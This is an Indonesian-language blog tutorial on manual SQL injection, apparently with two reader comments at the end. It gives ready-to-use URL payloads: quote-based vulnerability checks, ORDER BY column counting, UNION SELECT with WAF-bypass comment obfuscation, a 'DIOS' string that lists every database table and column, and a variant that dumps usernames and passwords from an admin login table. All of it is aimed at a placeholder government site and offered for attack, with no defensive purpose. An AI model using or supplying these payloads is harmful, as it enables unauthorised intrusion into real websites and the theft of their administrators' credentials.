1. Pertama kalian harus cari target vuln Sqli.
Contoh: http://target.go.id/berita.php?id=28 Cara mengecek apakah target Vuln Sqli adalah anda tinggal menambahkan petik atas pada akhir url.
Contoh: http://target.go.id/berita.php?id=28' dan jika blank atau terdapat error barti itu vuln sqli.
2. Lalu kalian masukkan perintah order by di belakang akhir url
Contoh: http://target.go.id/berita.php?id=28'+order+by+15--+- Jika Error Forbidden atau yang lainnya barti anda harus membypass'nya
/*50000...*/+/*50000...*/
atau bisa menggunakan
/*12345...*/+/*12345...*/
3. Lalu kalian masukkan perintah union select, Contoh:http://target.go.id/berita.php?id=-28'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15--+- Jika masih terdapat error Forbidden mari kita membypass'nya dengan perintah
/*!12345union*/+/*!12345select*/
Atau bisa dengan
/*!%55NiOn*/ /*!%53eLEct*/
4, Lalu kita langsung masukkan saja Perintah dios untuk menampilkan semua isi database target dengan cara mengubah angka togel yang muncul setelah kita union select tadi.
Contoh: Contoh:http://target.go.id/berita.php?id=-28'+union+select+1,/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@)
,3,4,5,6,7,8,9,10,11,12,13,14,15--+-
Perintah DIOS: /*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345information_schema.columns*/)where@:=make_set(511,@,0x3c6c693e,/*!12345table_name*/,/*!12345column_name*/)),@)
5. Setelah Database tampil, Lalu kita akan mencari username dan password dan kita akan Dump'nya dengan cara merubah perintah dios untuk menampilkan databse tadi dengan perintah Dump DIOS
Contoh: http://target.go.id/berita.php?id=-28'+union+select+1,/*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345admin_login*/)where@:=make_set(511,@,0x3c6c693e,/*!12345username*/,/*!12345password*/)),@)
,3,4,5,6,7,8,9,10,11,12,13,14,15--+-
Perintah: /*!12345make_set*/(6,@:=0x0a,(select(1)/*!12345from*/(/*!12345admin_login*/)where@:=make_set(511,@,0x3c6c693e,/*!12345username*/,/*!12345password*/)),@)
Bagi Kalian yang belum paham dengan tutorial di atas, Silahkan bertanya lewat komentar.
Ada nomor wa om? Mau tanya2 hehe
BalasHapuslu hekeer asw
Hapus